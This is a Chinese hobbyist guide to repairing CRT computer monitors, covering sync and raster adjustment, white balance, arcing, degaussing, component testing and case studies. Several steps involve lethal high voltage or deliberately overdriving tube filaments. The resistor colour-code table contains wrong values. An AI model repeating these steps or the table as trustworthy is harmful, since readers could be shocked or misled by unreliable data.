    观察此显示器的光栅，亮点很细，凭多年的经验可以判断，这应该是一台0.28mm点距的显示器。况且光栅的几何失真度也很小，可知这台显示器的质量还是不错的，并非低行频的老式VGA显示器。不能设置高分辨率的原因很可能是显示器的行频被内部调定在640X480的分辨率上（很多老式服务器上的彩显经常是这样的），而在800X600分辨率时不能自行同步调整行频，因而造成了上述现象。
    按以下步骤进行调整：
    1.在显示器的主电路板上找到调整行频同步的31.KH2和35.5KH2的微调电位器，以及行相位微调电位器H.PHASE等相关的被调整部位。（如果缺乏相应的专业知识，只要对着“31.2KH2”等几个关键字一一寻找，就没问题啦。）
    2.开启主机，调节光栅的幅度，方向为止为标准状态。（此举的目的是为了下一步骤的同步行频调整提供一个正确的光栅位置。）
    3.在纯DOS状态下进入分辨为800X600的程序（如经典的看图程序see1.3），此时显示器开始失步，屏幕呈多条滚动的水平横线，选择在纯DOS系统下进行调整操作，是因为此时分辨率的切换的稳定性比较高。
    4.调节35.5KH2同步的电位器，画面同步，且保持位置正确，就像播放幻灯片一样，很容易的。当然，耐心还是必须的。注意，有些显示器时调整31.2KH2同步电位器，多见于欧美的老牌彩显。
    5.如果成功的完成了第4步，那你已经有了98％的成功的把握了。进入windows 98，设置分辨率为800X600（一定要重新启动系统），此后windows的画面焕然一新，字体图形清晰精细。
    6.这时，我们偶尔会发现图像不太稳定，所以也别高兴得太早。还有最后一步。调整行相位电位器，使光栅居中（用“斗鸡眼”的方法看，使屏幕上一条极细极淡的光栅线位于全屏中央），这样同步就更稳定了。至此，调整完毕。
    一些使用久了或热稳定性较差的显示器，有的也会出现失步的现象，这时就可按以上的步骤来处理。
    有一点还是要提醒以下的，不要因此方法强制14寸的彩显运行在1024X768的分辨率下，因为对于14寸的普遍SVGA彩显来说，800X600的分辨率是最佳的显示模式，更高的1024X768的分辨率并非理想，毕竟14寸的屏幕所拥有的像素有限，过高的分辨率使它力不从心，会带来一些弊病，例如显示清晰度下降，不能设为64K的高色彩，系统连度变慢，软解压播放VCD的帧数下降等。更严重的是，有的14寸的显示器不能工作在过高的行屏状态下，否则会使显示器的工作电路老化，甚至很快暴废（决非危言耸听）。
    二、光栅宽度（行幅）的调整
    有些极为老式的古董级彩显，在windows环境下会出现光栅宽度不足，画面两边各有1厘米或2厘米的和边。实际上成为12寸的彩显，造成屏幕面积很大的浪费。当显示器面板的水平宽度点为期已调尽时，就必须开盖对机内电路进行调整。
    打开后盖，找出行幅度磁心、行中心、行线性微调电位器。开启主机，调节光栅的幅度、亮度和水平中心位置为标准状态（此举的目的是为下一步骤的调整提供一个正确的位置标准）。然后调节行幅度磁心微调电位器，使光栅幅度加大，但此时又可能出现光栅的枕状失真（即光栅左右边界有弯曲），这时可配合调节行线性、行中心微调电位器，使光栅幅度够大且枕状失真最小。
    在很多情况下这种调整不一定能使光栅满屏，要取得更好的效果，就要在行扫描电路上想办法了。我们知道光栅的幅度与显像管的阳极高压有关，阳极高压降低一点，光栅就会变宽一点，而显像管的阳极高压值又与行扫描逆程时间的长短有关，因此适当增大行扫描输出管逆程电容值，就能增加行扫描逆程时间，降低显像管的阳极高压，得到理想的满屏光栅。
    具体的做法是：在原来的行逆程电容器（行管集电极的对地电容器）上开联一个电容器，这个新加的电容器容量约为原值的20％，为1200pF左右，通过实验确定容量后焊上。电容量适可而止，切勿过大，且要用耐压在1500V以上的优质电容器。确定并焊接好电容器后，可看到光栅幅度宽了，但亮度同时略微变暗。此时要调高亮度，但如果只是靠显示器面板上的亮度旋钮和对比度旋或来调节，画面图像将会晦暗，缺乏鲜明度，正确方法是适当调高显像管的加速极电压，调整的部位是行输出变压器上的SCREEN电位器。在行幅、亮度调好后，还要适当调整枕状失真。最后还要仔细调整聚焦（调整行输出变压器上的FOCUS电位器），达到最好的清晰度。
    另一个要注意的问题是显像管的灯丝电压。部分彩显的灯丝电压由行输出变压器供给，加大行逆程电容后，灯丝电压会有所下降，从而影响显像管的显示质量及寿命。行扫描输出变压器供给灯丝的电压是有效值为 6. 3V的脉冲电压，用万用表不能测量它的真实值，但我们可以用万用表测量调整前后的灯丝电压，然后再比较，就能得知其正确的指示值。如果灯丝电压减少值超过3％，就要将其调高。具体做法是把显像管管脚的电路板上的灯丝限流电阻值减少到合适值。
    附带要指出，在行输出变压器修理工作中，也要检测和纠正修理后的显像管的灯丝电压，因为非原装的行输出变压器供给的灯丝电压往往会过高或过低，容易造成显像管显示不正常和早衰。
    调整好的显示器在Windows的状态下可达满屏显示，有效显示面积增加15％以上。此时在DOS状态下会超屏，但靠面板上的行宽旋钮和行中心旋钮能很容易地调回。
    三、光栅的维修
    一台CUP－5468型彩显，症状如下：工作指示灯亮，荧光屏无光栅。用手背靠近荧光屏有高压静电反应，将亮度旋钮调至最大值，荧光屏出现淡红色光栅，约5分钟后光栅消失，工作指示灯亮。关机后再通电，故障重现。
    这是一个典型的光栅故障问题。显示器出现淡红色光栅，说明视放及显像管电路有故障。由于显像管电子枪各阴极发射电子束的数量受阴极电压控制，电压越高，发射电子束越少，反之则越多。通常视放电路R、G、B哪一路出现故障，光栅就相应呈现哪种颜色，且大都伴有满幅回扫线（这是很重要的一个经验，切记）。因此从故障现象来看，造成本故障的原因可能是：
    1．红色（R）控制电路有故障；
    2．因行振荡器的振荡频率处于高压保护临界值，产生该故障是由于启动了高压保护电路所致。
    首先用万用表测量R、G、B 3个电子枪的视放驱动电路（具体数据见表）。
    比较发现R电子枪的两个放大驱动管不正常：Q804的b、e极有压降，说明其处于工作状态；而Q801的e极电压相等，说明be结已被击穿或未工作。卸下两驱动管检查，发现彻Q801被击穿。更换之，通电屏幕呈青灰色，调整驱动管Q801～Q803的基极电位器UR8.1～UR803，直至光栅呈白色为止。然后再检查行输出管Q702正常。调节UR701（H－HOLD）行同步电位器，高压恢复稳定，彩星工作正常，故障排除。
    如遇到相似的故障，只要依照前面说道的一则经验，用以上的方法，一般都可以解决。
    四、S形图象显示的维修
    一台EMC PV768 14寸彩显，显示屏光栅缩小，且图像有S形扭曲。看起来挺麻烦的。
    其实，光栅收缩且有s形扭曲，一般是由于电源电压中波纹系数过大引起。开机，检查电源输出的主电压，发现电压已由＋80V下降至＋60V左右。再检查电容C510两端的电压为＋300V，正常。（若C510容量下降，常常引起＋300V电压下跌）再用100微法/160伏的电容并接在C526两端，开机光栅立即恢复正常，检测电源输出的主电压已上升到正常值，图像的S形扭曲消失。由此可推断，该故障是由C526的电容量减少所致。焊下电容 C526，发现其引脚有电解液渗出的痕迹。更换之，故障排除。
    这又是一个典型的由电容故障引起的问题，根据经验：如遇到S形显示故障，可直接用替换法来检修电容C526。
    五、白平衡的调整
    显示器在使用一定时间后，会发生颜色偏差的现象，如出现红底色、蓝底色或绿底色等。偏色故障（白平衡不良）对文字处理工作无碍，但如果你播放VCD、玩游戏、欣赏图片等，则会明显感到颜色失真。白平衡不良故障有以下两种情况：
    1.多数时间白平衡正常，但有时偶尔出现偏色。
    这种情况是色度输出晶体管的偏置电位器接触不良造成的。首先要判定位于显像管尾部电路板上的哪一个电位器出现问题，例如在屏幕较暗时显得偏红或者缺红，就是低亮度的红色驱动电位器接触不良；屏幕较亮（例如Windows的白色屏面）时显得偏红或者缺红，就是高亮度的红色驱动电位器接触不良。找出故障部件后，可用市售的电气接触点清洗剂或纯酒精喷涂这些部件，以消除接触故障，一般都能解决问题。如不行干脆更换之，然后按下一步骤调节白平衡。
    2．稳定的偏色
    这是显示器使用日久后某些元件变质的缘故，例如电子枪的三个阴极发射能力变化失去平衡，色激励放大的晶体管参数发生变化等，这些变化相对稳定，可以调整显像管尾部的三基色微调电位器来重新恢复平衡。
    我们知道显像管的白色（W）是由红（R）、蓝（B）、绿（G）三菱色组成，其关系式为：
    W（白平衡）=0.30R＋0.11B＋0.59G
    在白平衡失调时，即某一基色的成分改变时，屏幕的纯白色就偏移，其规律如下：
    白平衡＋红→偏红，白平衡＋蓝→偏蓝，白平衡＋绿→偏绿
    白平衡－红→编青，白平衡－篮→偏黄，白平衡－绿→偏紫
    根据这个规律，我们可以有的放矢地进行白平衡的调整。
    显示器要在低亮度和高亮度时都能取得白平衡，就需要在屏幕上分别显现暗画面和亮画面作为调整对象。但微机彩显与电视机不同之处在于它本身难于提供一个有阶梯亮度的黑白图像信号，也无色度电位器可使彩色图像变为黑白图像，因此我们只有根据微机的信号特点来找出合适的屏幕调整信号。
    给显示器通电十分钟后，进入DOS系统的黑色背景，开大亮度使黑屏幕变为灰色，然后仔细调节低亮度背景的红、绿、蓝三个电位器，使屏幕呈纯灰色，不偏任何色调，这就基本调好了低亮度的白平衡。再进入Windows系统，在其亮白的背景下分别调节红、绿、蓝三个驱动电位器，使屏幕呈纯白色而不偏任何色调，这样，高亮度的白平衡就基本调好，但这时低亮度白平衡可能又有所偏移，须返回DOS下再微调。反复调整后屏幕图像从黑变到亮白都保持纯黑－纯灰－纯白的颜色，白平衡调整便告完成了。
    有时电位器调到尽位仍然不理想，就要在电位器上并联或串联电阻来达到白平衡的要求。
    提供白平衡调整的图形对象的另一方法是，进入一个图像处理程序如ACDSEE、PHOTOSHOP等，打开一个照片图像后，将其处理为黑白图像，并扩大到满屏，这样就提供了一个有丰富灰度的调整对象。对图像的暗、明之处分别进行低亮度和高亮度的白平衡调整，就能得到全层次都无偏色的纯黑白图像，从而得到满意的白平衡调整结果。
    六、显像管的延寿方法
    电脑显示器的寿命很长，但其中也有早衰的，有的是由于使用时间太久，也有的是由于使用了滤光率较高的“视保屏”而操作者又习惯用较高亮度所致。
    显像管衰老的特征是白平衡不良，呈紫色，这是因为显像管内绿枪阴极最容易衰竭的缘故，从上一节白平衡的公式中也可以看出绿枪阴极发射负荷最重。这种衰老导致的紫色画面是无法调白平衡的，强行加大绿色激励只能出现大面积的绿色色斑和拖尾失真的现象。
    如果只是利用电脑去做一般的文字数据处理，这种“衰老”的显示器用起来还算差强人意。但如果要用于图形处理、玩游戏、播放VCD等需要纯正彩色的工作，就必须对其进行激活处理，具体方法如图所示。
    图中先把显像管灯丝电压提高约50％，在温度增高的条件下，给绿枪阴极第一栅极加上80V左右的正电压，用电位器控制第一栅极的正向电流为25mA，经过10分钟至20分钟，能使已衰老钝化的绿枪阴极重新激活。操作时必须先给灯丝加载正常的6.3V电压预热，然后用开关S2使灯丝电压提高到10V，这样可避免直接加入过高的电压，使冷态下的灯丝烧断。
    在灯丝电压为6. 3V时，用万用表（R×1k挡，黑笔接栅极，红笔接阴极）检测绿枪阴极的珊极电阻值，便可得知其被激活恢复的程度，测量值视万用表的型号而异。例如在激活前为十几千欧姆，激活后为几千欧姆，接近红枪阴极或蓝2枪阴极的栅极电阻值，就认为激活成功了。
    偶尔也会遇到红枪阴极或蓝枪阴极早衰的显示器，可同样地进行类似处理。
    此法一般可恢复衰老阴极的大部分发射能力，使衰老的显像管再维持白平衡工作约一年或更长时间。之后还可以用提高灯丝电压（即灯丝的馈线在行输出变压器上加穿一圈）的方法再“透支”使用，榨干它最后一滴油水。


显示器维修常识

《一键清理系统垃圾》

显示器维修常识

    1.首先要树立信心，坚信通过自己不断的学习和努力一定能解决出现的问题。在实际维修中，所遇到的问题多为较简单的问题，真正大的问题很难遇上。在维修中要做到胆大心细，并且一定要注意安全。
    2.准备烙铁、万用表、十字和平口的螺丝刀、焊锡丝等常用工具。烙铁选择20W～25W的普通优质烙铁即可；对于万用表，初学者就选个量程较大的数字万用表吧；焊锡丝买两三米就行，但一定要内带松香的优质焊锡丝，其焊接质量要好得多；螺丝刀等拆卸工具大大小小准备几把就行了。
    3.维修前应了解问题发生时的情况，比如电压是否稳定、有无碰撞、是否受潮受湿、有无异味异响、图像是否稳定等等情况，做到心中有数。在准备拆机前，可先检查一下彩显的外用电源是否正常、电压是否稳定。接着可检查一下彩显的开关和各旋钮是否正常、有无明显的迟钝无力现象。最后应看清彩显的牌号、新旧、灰尘等外表情况。
    4.按下开关，观察一下显示屏的情况，如屏幕上有无光栅图像、图像是否稳定、是否有失真、亮度对比度是否可调等等，另外注意一下显示器内是否有异味或打火等现象。
    5.打开显示器的后盖，仔细检查一下显示器内部元器件有无损伤、击穿、烧焦、变色等明显的故障。其次可重点检查一下元器件有无脱离、虚焊、机内连线是否松动。
    6.在没有了解清楚故障部位的情况下，不要对显示器内的一些可调元器件进行盲目的调整，以免人为地将故障复杂化。遇到机内保险丝或限流电阻等保护电路元器件被击穿或烧毁时，要先认真检查一下其周围电路是否有问题，在确认没问题后，再将其更换恢复供电。
    7.在更换元器件时一定要注意焊接质量，不要造成虚焊。另外焊接时间也不宜过长，以免损坏元器件，造成不必要的经济损失。多次焊接元件后容易造成铜箔从线路板上脱落，大家须注意。
    8.维修时应按照先检修电源部分、再检修光栅部分、最后检修图像及图像稳定部分的顺序。因为电源是显示器各部分能正常工作的能量之源，而光栅又是能正常显示图像的基础。
    9.最后要注意的是，烙铁、螺丝刀、元器件等要妥善放置，维修后显示器内的异物要及时清理干净，连线和插件要重新安装到位，以免造成另外的人为故障。
    二、检修显示器的常见方法
    检修显示器故障的常用方法很多，下面就具体介绍一些维修中常见的检修方法。
    1.测电流法
    测量电流是维修显示器的基础方法之一。它主要用于测量晶体管和集成电路块的负载电流和工作电流，以此来检测集成电路、晶体管及其电源负载是否正常等等。只要所测得的晶体管或集成电路的负载电流正常，就可断定该电路的工作状态基本正常。反之，如果其电流与正常值相比变化很大，那就说明该电路有问题，可以对症下药，进行重点检查。
    2.测电压法
    测量电压也是维修显示器的基础方法之一，在实践中经常用到。它主要是测量电路和元器件的工作电压，以此来对故障部位和元器件进行判定。测电压又可分为测交流电压和测直流电压两种类别。测交流电压就是用万用表的交流电压挡，来测量显示器电源的交流电压值。当然也可在万用表上串联上一个0.1μF左右的耐压足够大的电容来测量场扫描输出电路、行扫描输出电路、视频放大电路等部位的交流部分。用万用表检查其交流电压，然后再与正常状态下所测数值进行比较，以此来判断该电路工作是否正常。
    3.测电阻法
    测量电阻也是维修显示器的基础方法之一。它主要分为两种测量：一种是测量显示器电路和元器件的对地电阻值，另外一种是测量元器件本身的电阻值。测量电路输出端的对地电阻值，可以判别电路的负载是否正常。例如当测量稳压电源输出端的对地电阻值时，如果负载电阻发生较大的变化，那么稳压电源输出端的对地电阻必然会有较大的变化，这就可很容易地判定故障的所在。当测量晶体管或集成电路块各个脚的对地电阻值时，需要测量其正反向电阻，通常情况下以负表笔接地时测得的阻值为正向电阻，而以正表笔接地时所测得的电阻值当然就为反向电阻了。这就可根据所测电阻值的变化，来和正常情况下的电阻值进行比较，就可判断出故障所在。
    当无法清楚地判断故障的具体部位时，可取下晶体管或集成电路块，测量晶体管各脚之间的正反向电阻值和集成电路块各脚与接地脚之间的正反向电阻值，也可大概判断出晶体管或集成电路块的好坏。
    4.观察法
    顾名思义，就是用眼睛直接观察元器件是否烧毁、损坏、变形、变色、破裂以及接通电流后显像管灯丝亮不亮等，这些问题往往就是故障所在或与故障密切相关，找到这些问题，就能很快地判断出问题，从而修复显示器。
    5.敲击法
    这也是检修显示器很有效的方法之一，特别是对于虚焊和接触不良等引起的故障。其方法是：用绝缘体，如木棍，在加电或不加电的情况下，对有可能出问题的部位，进行轻轻敲打和按压，就可以较容易地发现虚焊和接触不良等故障。
    6.摸温法
    就是直接用手去摸被怀疑的元器件的温度，可很快地判断出问题所在。这种方法主要用于检查电解电容、变压器、晶体管等部件出问题时可用，根据其温度的异常变化、温升高等现象来发现问题。切记此方法一定要在断电的情况下进行，千万注意不要烫着自己。
    7.冷热法
    这是一个很有效的方法，特别是对于一些热稳定性差和一些发热较严重的元器件用此法比较有效。当发现某个元器件温升异常时，可用纯酒精蘸在棉花球上敷于该元器件的表面让其迅速冷却。其原理和硬件超频中的水冷降温法相同。待冷却后再开机，如发现刚才的故障明显减轻或消失，则可初步判断该元器件已热失效或已有问题，可将其更换之。而加温法则是和冷却法相辅相成的，当发现元器件热稳定性差时，用冷却法无效的情况下，我们就可用烙铁或电吹风等对被怀疑的元器件进行适当的加热处理，然后再开机观察，如发现刚才不明显的故障加重了，那我们就可对该元器件进行重点检查，甚至将其更换。
    8.干扰法
    在业余条件下，用干扰法进行检修也是一种较常见的方法。其方法是：用螺丝刀等物去接触该电路的输入端，输入人体感应信号或碰撞时产生的物理性杂波。用来检查视频、中频等电路，然后可根据显示屏上的杂波反应，基本上可以断定电路工作是否正常。其检查顺序应从后级向前级，检查到哪级无杂波反应哪级就有问题，就可对其进行重点检测。
    9.换件法
    换件法是实用和快捷的检修方法。当你对哪个元器件拿不准时，就可先将其更换掉，换上好的元器件，如果故障消除，就证明原来的元器件有问题。特别是对于一些不便测量的元器件更应如此。如高压包（内部绕组短路），高压硅堆（其内部绝缘不好，整流特性差等）以及一些电容电阻等。
    编者注：显示器内有高压电源，请菜鸟们谨慎行事，注意安全，最好在专业维修人员的指导下进行维修。

II.下面具体介绍一下常见故障的检修方法。
    一、如何维修显示器的开关电源
    如今显示器中的电源绝大部分采用的是开关型稳压电源（简称开关电源）。所谓开关电源，是指开关电源中的调整管工作在截止区和饱和区。调整管截止时，相当于机械开关的断开，调整管饱和时，相当于机械开关闭合。这种起开关作用的三极管，就叫开关管，而用开关管来稳定电压的电源，就称之为开关型稳压电源。显示器中常见故障大多是开关电源的故障。
    按开关电源和负载的联接方式划分，开关电源可分为串联型和并联型两类。串联型开关电源的输出端通过开关调整管及整流二极管直接与电网相连，故其底板带电，俗称“热底板”，给维修带来很大的安全问题，大家在拆机的时候要注意；而并联型开关电源，其输出端与交流220V电网间由开关变压器一次侧、二次侧进行隔离，因此整机电路板上除了与开关变压器一次侧相连的部位外，其余地方均不带电，故称其为“冷底板”。并联型开关电源安全性好，但是其电路相对复杂，对开关管的要求较高，如其保护电路工作状态不稳定，产生的故障也较为严重。
    维修开关电源是显示器维修中的重点（在日常维修中占显示器维修量的70％左右）和难点。在维修开关电源时最好加入一个隔离变压器，它可避免由于接地端带电造成人员触电的事故。对于14英寸到17英寸的显示器，用70W～100W的隔离变压器就够了。
    在维修开关电源的时候可以采用降压检修法。其方法是：将显示器的电源插头接在一个交流调压器上，再把调压器的输出电压调到100V左右，然后通电检修，并逐次提高电源电压来检修。
    故障实例一：开机便烧坏保险，输出电压为零。这种情况一般是由于开关管被击穿，发射极和集电极短路所造成的。此时可先将开关管拆下，测其发射极和集电极对地电阻，如为零或很小，则换掉即可。但也要检查下其它元器件有无问题后方能开机。
    故障实例二：光栅出现“S”形的扭曲。这种问题应重点检查滤波电路和稳压电路，一般是因为有一只二极管断路，由全波整流变成半波整流，这也可能是其滤波电容容量减少所致。
    故障实例三：交流220V整流滤波电路出现短路性故障，且开机烧保险。先检查一下整流二极管有无短路、滤波电容是否严重漏电。还可拔去消磁线圈插头，检查一下消磁热敏电阻有无短路性故障，如有应换新。
    故障实例四：开机无光栅、无显示、电源指示灯不亮，但未烧保险。这时应检查交流互感变压器是否开路、整流电路的限流电阻有无开路（烧断）失效，或整流二极管是否断路。
    故障实例五：无光栅、无显示，且机内发出异常声响。如发出“吱吱”声，说明振荡频率低，应检查与振荡有关的元件，如发出“嗒嗒”声，说明电源过流保护，应检查过流保护电路。
    故障实例六：输出电压高于或低于正常值。输出电压高出或低于正常值十几伏到几十伏，但又不为零，保护电路也未动作。这时的故障现象将随电压变化而情况各异，可调整稳压电位器，如输出不变或变化很小，就说明取样差放电路有故障，其中提供基准的稳压二极管被击穿或短路的可能性很大。
    二、显像管高压打火故障的维修
    显像管高压打火故障也是显示器维修中最常见的问题之一。主要表现为荧光屏光栅出现许多无规律的亮点，严重时成点状的线，有时还可听见机内“吱吱”作响，如果打火严重，将造成图像模糊，并可能在数秒或数分钟后出现光栅消失的现象。显管高压打火产生的原因和部位较多，主要有：显像管座内高压打火；显像管高压嘴或高压帽打火；高压包高压引线端打火；聚焦电位器内部接触不良打火等等。下面我们就分别的说一下其维修的方法。
    1.显像管座打火的维修
    显像管座的打火一般在聚焦极。产生显像管座内部打火的原因主要是显示器使用的环境过于潮湿或长期不用造成的。由于聚焦极的电压很高在4KV～9KV之间，修理方法是，关掉电源，将管座从尾板上拆下，用小刀或细砂纸将管脚的锈迹刮去，再用纯酒精清洗干净，并把管座塑料内壁的锈迹用酒精清洗干净，然后用吹风吹干，重新装好即可。
    2.显像管高压嘴或高压帽周围打火
    显像管高压嘴周围打火，除环境潮湿外，还有显管的高压嘴和锥体玻璃之间接触不紧密或有杂质有关。要修高压嘴打火，先得对其放电，方法是将大号木柄平口解刀，插入高压嘴中多次接触底板即可，有时还可听见“啪啪”的放电声。然后取下高压帽，检查高压嘴及高压卡簧有无锈迹，其周围有无打火迹象和积灰。如有，可按照前法将其清除干净，然后用电吹风将其吹干，要注意温度和时间，以免显管局部过热而炸裂。然后在高压嘴周围均匀的涂上一些黄油，再扣好高压帽即可。
    3.高压包及聚焦电位器打火
    高压包打火可造成光栅模糊或无光栅。如果是高压包本身打火，那就只有换新的。如果是高压包的引线端打火，可用纯酒精将其擦干净，滴一点绝缘清漆即可。如果是高压包上的聚焦电位器打火，可关机后调整聚焦电位器多次，看是否能使其内部触点接触变好。如不行，最好还是将其更换掉。
    三、如何对显示器进行消磁
    显示屏被磁化出现色斑也是常遇到的问题。其产生的原因主要有：显示器靠近磁性物品被磁化；搬动显示器后，使机内偏转线圈发生移位，产生色纯不良；消磁电路损坏。虽然一些显示器自身带有一定的消磁功能，但对于较严重的磁化就有些无能为力了。
    对于因受外磁场干扰而造成的色纯不良，可用外消磁器进行消磁。消磁器可购买，也可自制。在应急的情况下，可找一只废旧电度表（1A～5A均可），取下电压线圈，将其“门”形线芯取掉，只剩穿入线圈的T型铁芯和线圈，然后在线圈的两接线柱上接上电源线及开关插头，再用塑料布将其缠牢即可。但无论哪种消磁法，都要注意安全。通电后手握消磁器不断晃动，逐渐靠近荧光屏，对带磁部位可反复进行，然后一边晃动消磁器一边后退到离荧光屏2米左右再关掉电源。每次通电时间不宜过长，如果一次消磁效果不好可反复进行几次。
    由于搬动显示器后造成的色纯不良，可打开显现器后盖将偏转线圈恢复原来的位置，并将偏转线圈螺钉拧紧即可。对于因机内消磁电路损坏引起的色纯不良，可先检查一下热敏消磁电阻是否损坏，将其取下，用手摇如发出“哗哗”的声音，则为热敏电阻已坏。用万用表查其引脚电阻值，如阻值小于8欧或大于50欧则说明消磁电阻内RTC元件已坏，应换新。如消磁电阻阻值正常，则应重点检查消磁线圈的引线，插头，插座之间有无松动和接触不良。另外如消磁电阻短路或漏电还将造成开机烧保险的故障，大家要注意。
    四、屏幕显示故障的维修
    显示器使用日久后，就可能出现屏幕显示面积变大或变小的故障。这时调整其水平和垂直宽度电位器，调尽了也没效果了，就需打开后盖进行调整。例如一台14英寸显示器，使用三年后出现上述故障，在640×480显示模式下屏幕基本正常可调，而在800×600显示模式下，严重出现小屏，画面两边各有两厘米左右的黑边，且调尽机外旋钮也是如此；更可气的是在640×400的DOS模式下又严重出现大屏，以至于在启动时连启动画面也只能看到2/3，调整外旋钮同样不起作用。拆下显示器后盖，见其主电路板上共有四组微调电位器旋钮，分别是H.WIDTH、PIN、V.HEIGHT、H.PHASE，另外还有31KHz、35KHz、38KHz三个同步电位器旋钮，它们分别负责640×400/640×480/800×600三种显示模式。连接好显示器，打开电源，分别在Windows和DOS（640×400）三种显示模式下，用小号螺丝刀，分别调节电位器旋钮至三种分辨率都满意为止。因为各个显示器这几个旋钮大同小异，大家可反复多试几次既可。调整完毕后，再进入相应的显示模式下，根据需要再调节一下聚焦和亮度至自己满意为止。这两个旋钮一般在高压包上，大家在调整的时候注意安全就行了，因为高压包上电压很高。对这样的调整关键就是要胆大心细。
III.基本概念
显示器是电脑中的基本输出设备，是人与电脑对话的窗口。它在电脑配置中是一个耐用器件，许多电脑的升级都是在保留显示器的前题下进行的。电脑主机一般只能使用两三年或四五年，便因所使用的新软件的技术要求提高，而被淘汰；但显示器对一般用户来说，可以使用十年左右，可是在使用过程中，也会经常遇到显示器出问题，作为电子爱好者都是自己动手维修，可是由于各厂家为自己的产品能有较强的竞争性，均采用了许多新技术、新工艺，加之生产厂家均不提供电路图，也不提供相应的维修资料。因此在维修显示器时，经常会因缺少维修资料，而觉得束手无策。我在这里特别推出显示器维修资料专题，为大家提供显示器的维修资料（主要提供电路图），相信当中的一些资料，在你查阅后会收获不小！限于水平及收集资料的限制，在此仅提供在业余条件下如何对常见的显示器的毛病进行维修的资料，为大家自己对显示器进行的维修提方供便。

    1.电容：电容常见的标记方式是直接标记，其常用的单位有pF，μF两种，很容易认出。但一些小容量的电容采用的是数字标示法，一般有三位数，第一、二位数为有效的数字，第三位数为倍数，即表示后面要跟多少个0。例如：343表示34000pF，另外，如果第三位数为9，表示 10－1，而不是10的9次方，例如：479表示4.7pF。
    更换电容时主要应注意电容的耐压值一般要求不低于原电容的耐压要求。在要求较严格的电路中，其容量一般不超过原容量的±20％即可。在要求不太严格的电路中，如旁路电路，一般要求不小于原电容的1/2且不大于原电容的2倍～6倍即可。
    2.电阻：电阻主要有碳质电阻、碳膜电阻、金属膜电阻三类，应用最广的为碳膜电阻，最高档的为金属膜电阻。电阻的阻值以色环来标示，其中最常见的为四色环标示和五色环标示。如采用四色环标示，其第一色环是十位数，第二色环为个位数，第三色环为应乘位数，第四色环为误差率。例如：四色环的电阻的颜色排列为红蓝棕金，则这只电阻的电阻值为260欧，误差率为5％。(具体参数见附表。)

色环电阻识别对应表 颜色 黑 棕 红 橙 黄 绿 蓝 紫 灰 白 黑 金 银 本色
对应数值 0 1 3 3 4 5 6 7 8 9 0
应乘位数 ×1 ×10 ×100 ×1000 ×104 ×105 ×106 ×107 ×108 ×109 ×0.1 ×0.01
误差率 1% 2% 0.5% 0.25% 0.1% 5% 10% 20%
温度系数 200ppm 100ppm 50ppm 15ppm 25ppm 20ppm 10ppm 5ppm 1ppm

    3.晶体管：彩显中使用的晶体管主要有晶体二极管、晶体三极管、可控硅和场效应管等等，其中最常用的是三极管和二极管，如何正确地判断二、三极管的好坏等是学维修显示器的关键之一。
    1晶体二极管：首先我们要知道该二极管是硅管还是锗管的，锗管的正向压降一般为0.1伏～0.3伏之间，而硅管一般为0.6伏～0.7伏之间。测量方法为：用两只万用表测量，当一只万用表测量其正向电阻的同时用另外一只万用表测量它的管压降。最后可根据其管压降的数值来判断是锗管还是硅管。硅管可用万用表的R×1K挡来测量，锗管可用R×100挡来测。一般来说，所测的二极管的正反向电阻两者相差越悬殊越好。一般如正向电阻为几百到几千欧，反向电阻为几十千欧以上，就可初步断定这个二极管是好的。同时可判定二极管的正负极，当测得的阻值为几百欧或几千欧时，为二极管的正向电阻，这时负表笔所接的为负极，正表笔所接的为正极。另外，如果正反向电阻为无穷大，表示其内部断线；正反向电阻一样大，这样的二极管也有问题；正反向电阻都为零表示已短路。
    2晶体三极管：晶体三极管是彩显中最常见的元器件之一，如何判断三极管的好坏是彩显维修的关键。要判断晶体三极管的好坏，方法是用万用表的R×1K挡或R×100挡测量。对于NPN型管，当负表笔接基极，正表笔分别接集电极和发射极时，测出的两个PN结的正向电阻应为几百欧或几千欧，然后应把表笔对调再测两个PN结的反向电阻，一般应为几十千欧或几百千欧以上。然后再用万用表测量发射极和集电极之间的电阻，测完后再对调表笔测一次，两次的阻值都应在几十千欧以上，这样的三极管可以断定基本上是好的。
    晶体三极管主要起放大作用，那么如何来判测三极管的放大能力呢？其方法是：将万用表调到R×100挡或R×1K挡，当测NPN型管时，正表笔接发射极，负表笔接集电极，测出的阻值一般应为几千欧以上；然后在基极和集电极之间串接一个100千欧的电阻，这时万用表所测的阻值应明显的减少，变化越大，说明该三极管的放大能力越强，如果变化很小或根本没有变化，那就说明该三极管没有放大能力或放大能力很弱。
    4.集成电路块：要判断集成电路块的好坏，可用万用表测量集成块各脚对地的工作电压、对地电阻值和工作电流是否正常。还可将集成块取下，测量集成块各脚与接地脚之间的阻值是否正常，在取下集成块的时候可测量其外接电路各脚的对地电阻值是否正常。需要特别说明的是，在更换集成电路块时，一定要注意焊接质量和焊接时间。 　　在更换集成电路块时一般要求用同型号、同规格的集成电路来进行替换。实在找不到原型号、原规格的集成电路块时，可考虑用相近功能的集成电路块来代替，但需要注意的是，代替时要弄清供电电压、阻抗匹配、引脚位置以及外围控制电路等问题。
    5.行输出变压器：行输出变压器（俗称高压包）是显示器中经常出问题的大件之一。其容易出的毛病主要为内部短路。这时可通过万用表检查电源电压来判定其是否正常，若行输出变压器绝缘性能下降或有匝间局部短路现象时，将使得行扫描电流激增，开关电源输出电压下降。因此，可通过测量电源电压来判断行输出变压器是否短路。


显示器维修两例

《一键清理系统垃圾》

显示器维修两例

    显示器是计算机的一个重要设备，是与人交流的“器官”，比较昂贵，也是经常出现故障的设备。
    实例一
    一台万普1448A3彩显，使用半年后出现屏幕颜色不稳定的现象，颜色会突然变化，持续的时间不确定，有时1秒～2秒钟，有时4秒～5秒钟不等，有时则必须用手拍击才能复原。
    这是典型的接触不良。开机检查各插接件，反复插拔，然后在打开后盖的情况下通电检查，故障似乎解决，颜色不再闪烁，但装上后盖不到几分种，故障重新出现。反复检查插接件、信号电缆，均无故障，最后只得拔下显像管尾板，把焊接在板上的铁皮盒子（屏蔽盒）用烙铁焊下，发现显像管管座的一个焊点出现了很细小的裂纹，重新点焊，故障消除。
    但是不久又出现新故障，机内出现不定时的打火，“啪”的一声，屏幕光栅会在响声出现的瞬间收缩，最后一次打火后出现无图像、无光栅、无高压（用手靠近屏幕无静电吸引感觉），但指示灯可由黄变绿，机内有轻微的交流声且变化不定。
